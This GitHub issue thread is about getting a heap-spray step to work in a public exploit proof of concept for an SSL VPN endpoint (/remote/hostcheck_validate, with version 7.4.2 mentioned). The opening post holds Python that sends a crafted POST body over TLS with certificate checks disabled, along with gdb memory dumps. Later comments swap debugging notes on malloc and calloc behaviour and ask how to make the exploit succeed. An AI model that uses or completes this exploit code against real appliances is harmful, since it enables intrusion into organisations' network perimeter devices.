Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

My heapspray has never been successful. I don't know if there is something wrong with the way I send packages. #4

Open
AshLQ opened this issue Mar 24, 2024 · 8 comments

Comments

@AshLQ
Copy link

AshLQ commented Mar 24, 2024

context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
def send_req(req):
try:
s = socket.create_connection(host, timeout=20)
except:
return -1
ss = context.wrap_socket(s)
ss.sendall(req)

body = (b"B" * 1808 + b"=" + form_value + b"&") * 20
data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: 192.168.81.100\r\n"
data += f"Content-Length: {len(body)}\r\n".encode("utf-8")
data += b"\r\n"
data += body
print('heap spray')
send_req(data)

(remote) gef➤ x/100gx 0x00007fc6897c0a0d
0x7fc6897c0a0d: 0xc6897c0ec800007f 0xc6898b6c3000007f
0x7fc6897c0a1d: 0xc6898b6c4000007f 0x000000000000007f
0x7fc6897c0a2d: 0xc6898b6c18000000 0xc6898b6c1e00007f
0x7fc6897c0a3d: 0x000000000000007f 0x0000000000000000
0x7fc6897c0a4d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a5d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a6d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a7d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a8d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a9d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0aad: 0x0000000000000000 0x0000000000000000
0x7fc6897c0abd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0acd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0add: 0x0000000000000000 0x0000000000000000
0x7fc6897c0aed: 0x0000000000000000 0x0000000000000000
0x7fc6897c0afd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b0d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b1d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b2d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b3d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b4d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b5d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b6d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b7d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b8d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b9d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0bad: 0x0000000000000000 0x0000000000000000

@CinnaTech
Copy link

I got the same results with the heap spray. Can’t seem to get a response from the user tho.

@AshLQ
Copy link
Author

AshLQ commented Mar 25, 2024

我用堆喷雾得到了相同的结果。似乎无法从用户那里得到回应。

Yes, I tested it today and it didn't effectively result in heap spray, I only managed to heap spray xxxx0a0d to overwrite it with 0x42424242 once, but the offsets in it were still wrong

@AshLQ
Copy link
Author

AshLQ commented Mar 25, 2024

It's still not working. I may need to change the way I send out packages.
(remote) gef➤ x/20gx 0x00007f84c7c50a0d
0x7f84c7c50a0d: 0x84c7ca478000007f 0x000000000000007f
0x7f84c7c50a1d: 0x0624306830000000 0x3007050501062b08
0x7f84c7c50a2d: 0x3a70747468188601 0x642e7073636f2f2f
0x7f84c7c50a3d: 0x2e74726563696769 0x2b080640306d6f63
0x7f84c7c50a4d: 0x8602300705050106 0x2f2f3a7074746834
0x7f84c7c50a5d: 0x2e73747265636163 0x7472656369676964
0x7f84c7c50a6d: 0x6769442f6d6f632e 0x6f6c477472654369
0x7f84c7c50a7d: 0x43746f6f526c6162 0x0000007472632e41
0x7f84c7c50a8d: 0x0000000180000000 0x84c7cf4990000000
0x7f84c7c50a9d: 0x060000000600007f 0x0000000000000000

@CinnaTech
Copy link

In the Assetnote blog I noticed with gdb the first request was made with calloc. But with mine shows malloc. I have tested golang and the result is the same. Something questionable about that poc maybe another blog explains it.

@CinnaTech
Copy link

Did you manage the heap spray?

@splashsc
Copy link

Hi, thank you for sharing, have you solved it? I also encountered the same problem

@AshLQ
Copy link
Author

AshLQ commented May 15, 2024

Hi, thank you for sharing, have you solved it? I also encountered the same problem

Yes, it's been resolved.

@heather-wyman
Copy link

Hey @AshLQ, I'm running into a similar issue trying to test this on 7.4.2. Would you be able to share how you got the PoC working? It would be much appreciated.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants